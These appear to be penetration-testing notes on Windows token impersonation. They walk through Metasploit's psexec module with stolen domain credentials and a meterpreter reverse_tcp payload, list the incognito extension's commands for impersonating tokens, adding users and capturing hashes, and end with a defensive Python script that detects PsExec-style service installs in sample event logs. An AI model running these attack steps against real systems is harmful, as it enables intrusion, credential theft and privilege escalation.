Token Impersonation

Load msfconsole and then search for psexec.

Select the module with use 4 (exploit/windows/smb/psexec) and set all the options: rhosts, smbdomain, smbuser, smbpassword, and lhost (set to eth0). Set the target to 2 (Native upload) and the payload to windows/x64/meterpreter/reverse_tcp.

After getting a session, load the incognito extension with load incognito (you can type load and then press TAB twice to see all the options).

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token
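A defender-side view of the psexec step above, as an added example that is not part of the original notes. PsExec-style execution places a service binary on an administrative share and starts it through the Service Control Manager, so the target records a network logon (event 4624, type 3) followed by a service install (event 7045). The records, field names, 30-second window and path heuristic below are constructed assumptions for illustration.

```python
from datetime import datetime, timedelta

# Constructed, simplified records (not real logs); field names are assumptions.
# 4624 = logon (type 3 = network), 7045 = "A service was installed in the system".
EVENTS = [
    {"time": "2024-01-10T09:14:02", "host": "WS01", "id": 4624, "logon_type": 3,
     "user": "CORP\\jsmith", "src_ip": "10.0.0.50"},
    {"time": "2024-01-10T09:14:04", "host": "WS01", "id": 7045,
     "service": "qLrTzWpA", "image_path": "%SystemRoot%\\kXbNmPqz.exe"},
    # Network logon followed by a service in Program Files: not flagged.
    {"time": "2024-01-10T11:29:55", "host": "WS02", "id": 4624, "logon_type": 3,
     "user": "CORP\\svc_backup", "src_ip": "10.0.0.9"},
    {"time": "2024-01-10T11:30:00", "host": "WS02", "id": 7045,
     "service": "BackupAgent", "image_path": "\"C:\\Program Files\\Backup\\agent.exe\""},
    # Binary in the Windows root but no network logon beforehand: not flagged.
    {"time": "2024-01-10T13:00:00", "host": "WS03", "id": 7045,
     "service": "helper", "image_path": "C:\\Windows\\helper.exe"},
]

def in_admin_share_root(image_path):
    """True if the service binary is an .exe directly in the Windows directory,
    which is the folder the ADMIN$ share exposes."""
    p = image_path.strip().strip('"').lower().replace("c:\\windows", "%systemroot%", 1)
    prefix = "%systemroot%\\"
    return p.startswith(prefix) and "\\" not in p[len(prefix):] and p.endswith(".exe")

def find_remote_service_installs(events, window=timedelta(seconds=30)):
    """Return service installs (7045) whose binary sits in the ADMIN$ root and
    that follow a network logon (4624 type 3) on the same host within `window`."""
    findings = []
    logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3]
    for svc in (e for e in events if e["id"] == 7045):
        if not in_admin_share_root(svc["image_path"]):
            continue
        t_svc = datetime.fromisoformat(svc["time"])
        for lg in logons:
            delta = t_svc - datetime.fromisoformat(lg["time"])
            if lg["host"] == svc["host"] and timedelta(0) <= delta <= window:
                findings.append({"host": svc["host"], "service": svc["service"],
                                 "user": lg["user"], "src_ip": lg["src_ip"]})
                break
    return findings

if __name__ == "__main__":
    for finding in find_remote_service_installs(EVENTS):
        print(finding)
```

Each finding names the account and source address of the preceding network logon, which is where triage of the credentials used would start.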
